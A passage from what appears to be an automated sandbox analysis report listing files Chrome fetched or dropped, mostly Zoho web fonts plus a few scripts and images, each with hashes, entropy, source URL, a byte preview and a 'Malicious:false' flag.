                                                    Entropy (8bit):7.996639915732296
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:EE705E4C75B8C2623B12D7A26F3B5416
                                                    SHA1:33A4E417D92920C3EF6F6E05F1C6F49C83375B9F
                                                    SHA-256:F7B70A966267BA9672DADE4752E31837F3B7AC101E9D6642CE8AE52CF05E0D12
                                                    SHA-512:E7B97C808FBFBE3C6C652CC417BCFEC244081FC69FDBF3230B565EDD1CB6430D81BBBD9449D62B77EC114435C3D6819FB6308982836A91D997BE1628FEC2E8CC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Black.woff2
                                                    Preview:wOF2OTTO...............W..............................h......*.`..X.6.$..8....<. [....9ete.K....s.Y..`.....2...&... t..j..b.=.(uW5...M...../I&1.../I..D.j..v.rx.:..`....U..BU!.W%.H......J.'.YUU....o&.{.......4.y....4.[..g_.'d..{.g.a.r5.L....%.V.L.......oC.y. 2"MW..S&..z.......}L.@..q.{.......*.OH...;.D.zy.:,L......t..b.....r[.O..t&..qS&!4&..#.p..%d...X.../'.?.)(..$0...j").{.....$".Q..F>..Tx.y.....=.&.?L.......| .=F.......&.qu...wl...y.y.y.......*g..f..;..;1.Q...<.~...`....v..?..T.....(...1...2...=.>..K.]....wo{.&....0..`.Q!....cD..*.h.i........|1r.Zm...[....7.mT_.l.%c`.[B..d+Q....X....J..0..g.......6....63..a.M...'fX...I$.I..>!y.$9'9..+)..N.I.b..../.%y3..b..[$](.G...m.H.+].....=.Q.....~ ?.`.`.m..R.S...L...bR.PQlZ.kT.=.8.4@....(..M..?_5,?z/&o.|)B$$a..<.......^.`.......fMhK...@..l-...:`..c.B8...w,...Fe5.\`qw)...(.j....].$!-#..g.=.^......2T..G.|.D.:>.Ws...m..5.......P.{.)}.V1$..(..\.(J.6...)uD...h .0aH(.S...MD.F.NT-jy.U3{.CH.c.N.4....8Ix.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text
                                                    Category:dropped
                                                    Size (bytes):7132
                                                    Entropy (8bit):5.498607786275732
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1C24DBFBDF5DC19FA09B0566526043FA
                                                    SHA1:22A4DB947749AFC9783C720140ECCA31086DAFBD
                                                    SHA-256:911DC50566F5EC93E4E34E3ADDD894EC226BE9AF9539CB918599A93326E1597F
                                                    SHA-512:ABC7E246A72A27413DDB699D98C20D02ECAFCC3D66EF3BEA6F18688CDBB6BDE7F7ECEB6615A34E9E15A7DF7E169095EE6A610FED89F70A02ACE70719E7BA01F5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:^0 zero.1 one.2 two.3 three.4 four.5 five.6 six.7 seven.8 eight.9 nine.10 ten.11 eleven.12 twelve.13 thirteen.15 fifteen.18 eighteen.1(\d) $1teen.2(\d) twenty[-$1].3(\d) thirty[-$1].4(\d) forty[-$1].5(\d) fifty[-$1].8(\d) eighty[-$1].(\d)(\d) $1ty[-$2]..# separator function.:0+...# one million.:0*\d?\d " and ".# one million and twenty-two.:\d+ ", "..# one million, one thousand..(\d)(\d\d) $1 hundred[ and $2]..# one hundred and one [:en-AU:] [:en-GB:] [:en-IE:] [:en-NZ:].(\d)(\d\d) $1 hundred[ $2]..# default: one hundred one.(\d{1,2})([1-9]\d\d) $1 thousand[ $2].# ten thousand two hundred..(\d{1,2})(\d{3}) $1 thousand$(:\2)$2.# [:en-IN:] one hundred thousand, two hundred.(\d{1,2})(000\d\d) $1 lakh$(:\2)$2.# [:en-IN:] one lakh and two.(\d{1,2})(\d{5}) $1 lakh[ $2]..# [:en-IN:] one lakh two hundred.(\d{1,4})(\d{7}) $1 crore$(:\2)$2.# [:en-IN:]..(\d{1,3})(\d{3}) $1 thousand$(:\2)$2.# one hundred thousand, two hundred.(\d{1,3})(\d{6}) $1 million$(:\2)$2.(\d{1,3})(\d{9}) $1 billion$(:\2)$2.(
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 52480, version 1.6554
                                                    Category:downloaded
                                                    Size (bytes):52480
                                                    Entropy (8bit):7.995476143888238
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:F2014B25EE6485C2C1C2C695013C83EC
                                                    SHA1:E68DEFC3845459200CCD93C9B2C19FB203C36FD3
                                                    SHA-256:9ED596FF00A0D7414BC2494BFD413205C7445A2A62C08305313C620F15247A93
                                                    SHA-512:10DF59FFF5E910FA2DE80E8C19C9835BFDFF25FFC48BDEEFE97488D6B2CF757D8863CEC3C10688B2B23C835E020A17D864BFEA9FAA5627B2FC53FE59D9EE0783
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/opensanslight/font.woff2
                                                    Preview:wOF2...............l...........................?FFTM.....\..D.`..n..*..4.....4..q.6.$..$..X.. ..1.....:[......v.O..VDv..}...#{...q[.B..AE..X#.t......>..........U.".lfOf.6.@..h...>.!.mM..U...9.<.9X.pZ.Z...(....]..V......2.....h.\..{.k.#.a.CN.c.6-<H'....GV.gU.5....XBl.Eb...o2%S..'..-...:|8..z....3..w.,S.K....Bt..J<...*.oX......rk~..jJ...^j.R...u.U..7.wt.%...5Cw~.x...+.}Nn...G..W...+vr...I}P..T..3Fk.3..-....Gk..s.Z{.hf9.).k:.:.>.m}Y?.+..tH.^~.......3.^X.f....E...z......5...:6q...=...)[...vg+.\7...i....B...c..B>!.~.o;...0o.NM .V..0....f.u..hA.;X....c,..%.I....^.....ofU......y33.?.E#s..f..9?/....s~..MOr..%.%I5.s.!!b....5.#..J6..E26`...TI..(.!Fr....z..zw....g|..L.aJ...M.u...!.".,. ..&k...)..Zd,D. .PJ.~.c.....v.K.@....Z.yT........?....#(.P.,,&....35..g..3I..I...h.dgw.....~.>...U3fS.=G.m;....@..6n./...O.i.n...q..@...#.......[T.I.Dd..... 3>..M}..d/.......kCC.........;\."\#TA...E. .K........J......(..d...._..=..e...).....i..S...q.@.[.[.....0 ].
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 234000, version 2.983
                                                    Category:downloaded
                                                    Size (bytes):234000
                                                    Entropy (8bit):7.997998150569756
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:F9C7D61FB5CC1D05A6DCA870B6B1E7CE
                                                    SHA1:EFFB6A870FB95CB372D96C56C1812B6B01711795
                                                    SHA-256:11238866EFEB00C513CDA8BC443AD2BB8B2F47E58FDEFE7DFE26583C5DF6AFD4
                                                    SHA-512:BC6FC0B7DEDC6E2074821C463980D312DBC0979F535EA17B767B47500C3453B5446B1CF0A3AC177D0C5B06D0E851221DC94BC25B789CD52CADC4D8EEE4012B57
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/lato2bolditalic/font.woff2
                                                    Preview:wOF2...............`..................................l.`..&..f........,..O.6.$..<..@.. ..E. ..9[....P...H.D'...".B).{.%b5.H..S.Io.;$......L.L..u......DU....oc.}.'i..&h..C.k..CBG....................................g'p..h...D....B.S.E>..G..&H=r.../.QZ*.J5F...).h4]K.n.O.....R..T.?.1....{..cd.{..X...(gu....E.NEu....."T&...h.)&0.i*.|}z.......+..,qjUX...q..4jC.p...b....NMU8.t2ev<bV.-;f......a%cWU:.D..k...."2_..F.l..i.m..t9lmc.mz./...x.....c.=.w,A......%.(........3..}..X.e*6P.a.H.i...."...g.G.....e.......]..<......*.),."N0K3.v..ksWeM........gh..8.<.P.:.,,QaE...O.8'...........=.H..i....)Q.D$vT..P.P..0.|......K.._.._A.@K.[....W.{X.l.Z.ODz.z..2sc..y.D..r".#.......q....}.7T.8....[..F..W..zf.L...rV..S.j.B....F...{.b.....F..A..m~.l..^...............[..>J..i.=FQ6...H....2..)....;E.+...8g..J<o..H..g..:...Sr.KL.DQ.aV.B=&.H...g.x$..u..\.1....7...<../K...W....v.v..J.k..H.x.~.&q...V..b....k.D.E..b.....KmO._..W".d....._.E..`..C.j....2~{...".z..0....F.-....>._...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 211384, version 2.983
                                                    Category:downloaded
                                                    Size (bytes):211384
                                                    Entropy (8bit):7.997983750239151
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:17107161BD66D1C430CDB2642CA19E19
                                                    SHA1:EA416355E91B26465F4EB9C771897BCA755CFBF8
                                                    SHA-256:E3AF450CEDD578B5DE62D210D0315E680AE70B24F41DA8E6030FE40F452A583A
                                                    SHA-512:F3B2AD623F3B794DBC8C6BE63F34A29847B751ABD36B971FA268B0F6F969658CF3465941BDD15948D50FD393D6EB6C648CCA3E512DC4F304B46D56671D249771
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/lato2medium/font.woff2
                                                    Preview:wOF2......9........4..9V...........................~..l.`..&..f........$../.6.$..<..@.. ..2. ..9[....p.C.W [!..Y^<on...{.6@Q...W1.j.....C.5Z...C....vH......(..*...s.?.!B..................................$?..{i.i....O.....3..u.y~...}.y......-.r)T^.y....JSE".U.H.TW%.F]..*.X2..d)....*.5...-...N*.._..XC.......5g.R-.@....2$L..5....X.L..Ej...r$..;.,.n.......W...y4@.A.$9qb..aG....!I..(..!.....#Hh.....e..`.Cf.J....'f*...Ml..J.....".d..,.Y<....Pbq.Z....WL.e.].....j......u...C.Y45.a.4...R.?...V/S.61kc..V..R..l-p.J..(...... ......y|..(...e....q......rd..5..(R.........].}.....P...$}j..K..L....\..V...dVN.Io#..\P..........2..)d..E...e.0pA..o.*D... .)..*.O....`.j..b$h=>@..R.u.d.t...y/ZW...rY.X..,.H...h.bN.x..K.O;. .V$.[.p...q.0(O....H.%H...#.V=.q.o.v-0....A.A......]........Y..b........J.G1#. ..X.6v.2.....m....P.J.....l.9.4}.4....1a.G.....#.2$T....C{.h..'V..@...U.3..z.:{.o....7..:.IH.(..P?..V&<..R8......M a./i......:0..V.-..j..:..8...Z/>..J..(.........=7..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), CFF, length 49928, version 4.0
                                                    Category:downloaded
                                                    Size (bytes):49928
                                                    Entropy (8bit):7.996381433200718
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:8896E526E8A7FD59F72466C416EAAC8D
                                                    SHA1:BC27799B12351012FE5F55065D37B37796308C81
                                                    SHA-256:457A664FAA5CBDA50A6FF7746A7DE411C0405089D1762556FF0F5E8EA06AE5A5
                                                    SHA-512:120381D6B8326526EBF68AC4D9EA1382E85994EE89DF520AE4B6EE9808EB47EA45BDCC8034549FD1FBFE81EF8D10B5B6D1B93809D893DC977421BBB62CF963D4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Semibold.woff2
                                                    Preview:wOF2OTTO..........C...............................j..h.....*.`..X.6.$..8....]. [.B.C.2v_.J....m..JuVS{...Y.;a..../P#;.!w+...........$...K.K.....:.?}A*F...'.t+"*"r.K..&..c".e.y....HN.....p..[.)V....aC..a4,x...kE.%bxL"..YE.i.c..u.y.....&.cL...Zz.f.90E..g..S...#..*..~..o..^.A..%2.V...E.R........Z,."..E....i.g...4^...G...M1.f.?b......4O5u.T.vq.BP.7........S.B...T..}..y....hG$1(..)...p.^..._i.>..*..o.&.w1..?:.......TI.`...D..l..Z.tf.D..\......Eo..&L...b.A..U...9....{d.s.|3...m...=Z@1"..~..E...\..W.2tQ......X..%..1..#.....P.B.....jD}hsE...Xq....{.h....w.@p...t.@..(`...I.$....=.,qW.vo.M.z...fw&y...Br0.p...Ua\.`S../*........z......3..@P.M.M...?.w.?...C.~....:.=7.:.....U..... .P..B..8....js.....\.RH.v...t.g....J........%A.Q.....tk.[.H.r.9n.......I+..n.;...`[3.5.........{C......KO....*..1z.Q.1...b.......@....z:...e.k...H8f.M.....5.F..0.)X...a...)%.........;....E|L..HzLHF<j... .!@....d.......<.s..DD..`J................y..>0...c...@....k.....
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1072
                                                    Category:dropped
                                                    Size (bytes):501
                                                    Entropy (8bit):7.533810358417031
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BA297DB577E890A1F50C7F314593760A
                                                    SHA1:D93F9FF0EFB410F657410C1F4CFA55B7BC13ABD5
                                                    SHA-256:2B4308FBE02E743CE59DFED30712AA354299BC9357C2B81084BC325613283CD6
                                                    SHA-512:7364B143ADD330317974EE1A92AA5D238FCD2013E30DD2CC568EA50A7DF856A6392BDFD07B59C79C34220C660338D6D40B48379C23E9CFFCD16626AFDF022601
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:..........}S=o.0....?..\...".P-..5C..Vm..m$....;G...(4...{...t.|.i.....s.v.~.....q.vz.........p...8v......w....e....O.OO....VJ.}......s.......:..)..p.R":dO%D.....0x.*;....*-..San......'....7.UQ....;....O..u.....f.....=..(.3..J.nX.A.*..|B.%.6..."p.E8.Y.u.RJ.P..WM.dkA.W..*P.a..........w.u<.6...<....R.&2..B*..S.bnX..H0....}.B.n..b.8.=..Z.cq./..+...:Z..1a..R7,>.`..p.....J.c.=g..<..(..*K.C.k...^7...>Gp.#$..x....w]x....:Z......./R.6.U.N6.v.,...Q.Zz.....:.5..'.B?..xuW........._V..'0...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):84927
                                                    Entropy (8bit):5.598687022727926
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CF9BDE54F3E9F61E4EF8AEBC15B0F18A
                                                    SHA1:2FCB17000254AFB8F87B13083AF2E5948F1FB166
                                                    SHA-256:7212291D669E4B09CB8E2D9125F6EAA53A3F8FBDB906E46B99075D701AFE70B1
                                                    SHA-512:6DC19E5C0542E92701C3C729CF4580290198393E53A91C493E90CA5B7840C80A1E2E56A8816F8DD13624A23C6D9B6754F50295FFA0CCAA8D80521313A426905D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):t.ZWAF=e()}(this,function(){"use strict";var et=function(t,e){if(Array.isArray(t))return t;if(Symbol.iterator in Object(t)){var i=e,r=[],n=!0,e=!1,s=void 0;try{for(var a,o=t[Symbol.iterator]();!(n=(a=o.next()).done)&&(r.push(a.value),!i||r.length!==i);n=!0);}catch(t){e=!0,s=t}finally{try{!n&&o.return&&o.return()}finally{if(e)throw s}}return r}throw new TypeError("Invalid attempt to destructure non-iterable instance")},it=function(t,e,i){return e&&r(t.prototype,e),i&&r(t,i),t};function r(t,e){for(var i=0;i<e.length;i++){var r=e[i];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}var t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t};function r
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):96
                                                    Entropy (8bit):5.218997042938778
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9872BE83FA60DA999B65A3BD481731D3
                                                    SHA1:B59A8688C6A0D5311C6410A0D91537084E148F2D
                                                    SHA-256:5DEE42A8D755847C0813D4E5F033F51197B20DD3C6C2EE4FBE31FD27B2F593D3
                                                    SHA-512:53E947C87386ECF19E3B36E3F292A9757911F0F8B02FE36DDFC0DD74A3C784D97B15066AB4895EA694F66792A8C7CF525F59A03868FF5D5F0C3B5203D34C5F7D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                    Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O348JyJcXRABGP////8P
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 52820, version 1.6554
                                                    Category:downloaded
                                                    Size (bytes):52820
                                                    Entropy (8bit):7.996391313957541
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:D54596D4A3C14435D5C4E25527154137
                                                    SHA1:318B538C04CE947920C1BA5C0FAFB5D012F472ED
                                                    SHA-256:60C0DC427CF378359578E0BA5E737F5100071581DC7DAD94E9B64F8BDA9CF6B7
                                                    SHA-512:B2526DACBEE4AE625AE45F93673CCAD4A893A9462EE5D95CBC4F9F9716A468FC0178E1B7A08E196F5DA1CBEFDF000B6B8C41BA372A32BD47A802A1F627DA6A13
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/opensansextrabold/font.woff2
                                                    Preview:wOF2.......T....................................?FFTM.....\..D.`..n..6..`........y.6.$..$..X.. ..^.....1[.......}.Rv.t..yB......`.!L...9&...h,.B....%r;8.ywBd.....K...UZ$....TNA..;...@.Mk...k..d.`d...:..N.d.UF....u..m0......8....7.... ..I..)..Q...MvX..T.t.......N.A:.5..]..$....."y.,.m...y..>..&...u.e.l`P.D[@.j....<?'....UA..0Q..X.......z..j.y3..W.]..KOd..E|..)lI.s..?].,.}....%R..a.....B......z....a..i.U.e...a32.....w...G...C'.....o.3+&.cx..]..vwr-/...wwc...'.W..+7..O...B.R...4.z.O..g..oY.....p.p.|m.K......e.y`..0........~..|.C.9....*b.:.N|m.:.HMe....a.h......g0..OC.Ef..9...u..|......)......,e..^r..a'...kY...un...qZ^..Vd.....N'w]...W..@3M.=...d.m.-...I..2...................Ww.d[.UV.."^....+0$l......H...2....d.{.....k.x.1#sf..v...o...d'.JI....0.BB.h..K.c.`0V.....Fn#F....+...,...S..k...?.T....P.....:e..3u..C....y.......].$..n...8.@4...}U....,......\./.&!.g..'@.q...4@...{J..2..)H......:%7.7_...0(}*0.N. E..!rL'.F..tS._...KB.:'.qZ=nr.m..~s}.O..k...S..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 52964, version 1.6554
                                                    Category:downloaded
                                                    Size (bytes):52964
                                                    Entropy (8bit):7.995694170398265
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:7C44D16AE67C6AD73844F1A3FC7BEB2E
                                                    SHA1:68409659E6AE0C2A25681DB7E6EC4F46C5C4368D
                                                    SHA-256:FCB0A57FF5E863EE52CA7A6E3083140A978848C5EFC6F8B42316246C52BF7B84
                                                    SHA-512:75116BB01BA9ED342632DF6AD0184D42DB20DD3829D16BB310572B23D0FA2EA34C39F39F1E2E4087BF3CD6AAB2942264DD10CAE1BBA215EF7445E18D2F07674F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/opensansbold/font.woff2
                                                    Preview:wOF2...................{........................?FFTM.....\..D.`..n..*..`.....0..X.6.$..$..X.. ..-.....x[........<.M.p.|..i.....\...c1G.52..2.m...-........_.,dL.?p.!.@E.V7..]AO.G......T).U....]....M..IE.v....s{v{.g ....rA..;.&.1.c_......{H4...V.........;.a7."J.%u.r.i.,g.f.qE.!I...'........S..4.hO...L!z..._..g:...m5..PS..4.K.Gg.............k.6...v.L.>.cCo.w.!.bU.p.<Q.$.r...).......g.>D....<..{...A+....'bB4~.....[..O.o..Zh..q.........&......]...#s.~>..-l..p.+p.L.Y....^P......v....WU...gu?!"..Ed....).......w.3...p.8kD9BV..'..N.....g....QHb7T..../...v&Id1.!.CUjR.K...W.,..I^.@..k..Pg.=.ReCX.8.]w.*5U.'U...'W{....... a....p.....!...m.:...B.l.4l..R.s.!.ml..q..V...zA..P.{..Y.G..,...(..LEu...f....^./h.J......Z.....?~!..#..n..P.Mn...tI....u].UzTJ;..(.UU....x......!.N......2..w..H-i.y".i.{...D..51.%.$.x|v...6e&F....6..` .b.6b$VM...^(.9#...E..O..\..............P...tu.....l.B.V..0.9..B.......(Q..$A....:.[mn..v.".....+pN._. ...U.........'R...i..d.....~
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                    Category:dropped
                                                    Size (bytes):621
                                                    Entropy (8bit):7.673946009263606
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4761405717E938D7E7400BB15715DB1E
                                                    SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                    SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                    SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (10440), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):10440
                                                    Entropy (8bit):5.159533704909686
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:51A477F8D44DC3F49A14ACA06FC78133
                                                    SHA1:5F05D85E05CBA69C3336BF482503A800F536F950
                                                    SHA-256:7C35D94CF84DD34FACBF355B22CB02798D516BB2D506A15AE124F497433D4D09
                                                    SHA-512:C110BAE421D31C703EA6EC4C0623DE9FD486AD90937970DE49FAC05966929C9CE5B77E977D7EEE1C11D1A9A698A3D96D8AB2F14C4121BFD72CB8C57951A90440
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:var helpLink={"zcrmkb": {"customize": {"MAILMERGE_LIMITS": "/customize-crm-account/customizing-templates/articles/mail-merge-templates#Mail_Merge_Limits_and_Purchase"}, "dataAdmin": {"SANDBOX": "/data-administration/sandbox/articles/sandbox-overview"}, "customerConnect": {"AUTHENTICATE_DOMAINS": "/connect-with-customers/email/email-capabilities/articles/ema#Steps_taken_by_Zoho_CRM_to_authenticate_domains_and_ensuring_deliverability"}}, "zwdkb": {"teams": {"CUSTOM_DOMAIN": "/teams/admin-console/settings/articles/enable-custom-domain"}}, "zwkb": {"howtocustomize": {"DMARC": "/how-to-customize-writer/articles/how-to-add-spf-and-dkim-records-for-my-domain-in-zoho-writer#What_is_DMARC", "CHANGE_FORM_ADD": "/how-to-customize-writer/articles/how-to-change-the-from-address-while-performing-mail-merge"}, "limitation": {"CHAR_IMG_CELLS": "/writer-limitations/articles/limitations-in-zoho-writer"}, "addons": {"AUTOMATION_CREDITS_LEARN_MORE": "/writer-add-ons/general-faq/articles/writer-automation-
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 67104, version 2.8978
                                                    Category:downloaded
                                                    Size (bytes):67104
                                                    Entropy (8bit):7.996468017572173
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:575B2C90317865F4FA89C675B09352B8
                                                    SHA1:ABEB68CA982FDB2D62ABF5FB8ECC893B3488FE3D
                                                    SHA-256:4CBB96FB37AA5316F24C6B9E3423C95B6980F66194BF4EC96178106826A42D37
                                                    SHA-512:8613F8D32AD5E931A48EBBDD67F96A963D22A3B7A8BB39E14C55268E8161F021C1A090F267CA110AAD6A4C9D49AC553054248B22C04DCD89D8E6768A7A5F4236
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/robotolight/font.woff2
                                                    Preview:wOF2....... ..............#.....................?FFTM..~...L..L.`....X..<.....,..R.6.$..8..... ..f..f..:[i........'.............i..h..c.......p..k.["..=.c.........&.cvP...k.A..f.<F.b.En...D+......N..^.0d.#F.O.y6o,.",....*M..R.=].u-...8Qru7........[5.0...........-......F...S:..-.....Bk...F.F...3.\.j..0P..c...'q..SI..n..8. ..U.b{..1F..t...^.......DCd.'.Wp...C.;.w....M>.....=...9x..W.R.......?k....[.v.CA.-I............#..s...T8.9.IF:..m(l3....{-.Ad..t...b..2M"....5A.i..u....'..].......0.........V?.T..cVO/.&..njf..=..TY.GH#n]."=...{1;...C.7.........FM*.S...>...w.....%yp..DI..uH....pT..w.(e. .G...p..............QH..\...9..^.Y .$...c...Z'....n.W..}..W..'.G..s.H...P....}.{.T..&....B.$.=$.l...H...(*k...W.W"[U..&,.....y.@_......x.#...aM+.z{.j..r.kH..iW.2....I&....T..d[.Hr.....1?...Y.W.44..#...<.T.....r.W.V..;.....&..../..xNeN.A..N...y.A.....d...+!.....".#..3)Y.....5..z...~k..QhI...kzX.......(....7...4.M.R1..E....%.C4.o..~.x...@.X....*...a......g..o..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):1062
                                                    Entropy (8bit):7.729232835183738
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:725681B49F77650B9C9B970EB784476C
                                                    SHA1:03B9DC915273407F5BF71B54E216D1148C63F33C
                                                    SHA-256:2ED6A58366FE3399DFA3196550769FA9B26C21AF6819E44F40B0530F202BA619
                                                    SHA-512:AEEE5DB9078AEE4D97B2591F2B974D0564D18A82F32FCD33154D29C21BC3AE188DC16726BFA76644D127059D051757ACB1E0FA2D92B4016003780965F4A9B4C9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_account_aad_c5cbcbb43e61b1347b12589901000621.png
                                                    Preview:.PNG........IHDR...0...0.....W.......pHYs...........~.....IDATh..Z-L$1..n......"..q........Kr$.. ....'AA......,.*.....+.C....Lw..%.t........v~....(.R#...... ....... .....[.!]...@W....N...U.Y.!...g..SpI...dV@)E...`./..N...Ap..p&..R4.......V5...f.J....H........PJ....:..A.T.2.G...'..K,b....L....SSS.yxxH,.<S.u...5...2ag].......C...<.e.G...d..U&.W.lBWWWx~~..d.3.QaG...x.....66....H~..7...!B.d..H...=..z.`\.j...%WI.Z.OOO.{.......!.....=",s{{..wvv....$...: ..s.........c188.....j..7..J\(....E..,.t..lL(..`...."................D..)....-3#4...8.Lf.8...].^2..'zzz0<<.%.P..5.....E.e...e........V+.[J....@\X...r+..lmm...Q.wwwcff&.|..,.y.FC.`......*.........1.........h...L,D....Ym......mFP..>o.....`..L.y.Q+.Y.7.&''.<...l..<.$..^@....<...,..)*......p..$.....;mF.c...U.R{.EI.S.E.....R..\|..7..r<RIB...4=.l...k].d..6::..lAh.F....v.c.&.f]..#i.z!.P(.........4-Gs.R....=...9.J| B....... .j..4.Bs.C.G...s.......R.*....a.......j..S$..k..4)t.<.....p:..w.xC..8.vK..NK....|WLx
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:GIF image data, version 89a, 352 x 3
                                                    Category:dropped
                                                    Size (bytes):3620
                                                    Entropy (8bit):6.867828878374734
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                    SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                    SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                    SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                    Malicious:false
                                                    Reputation:unknown
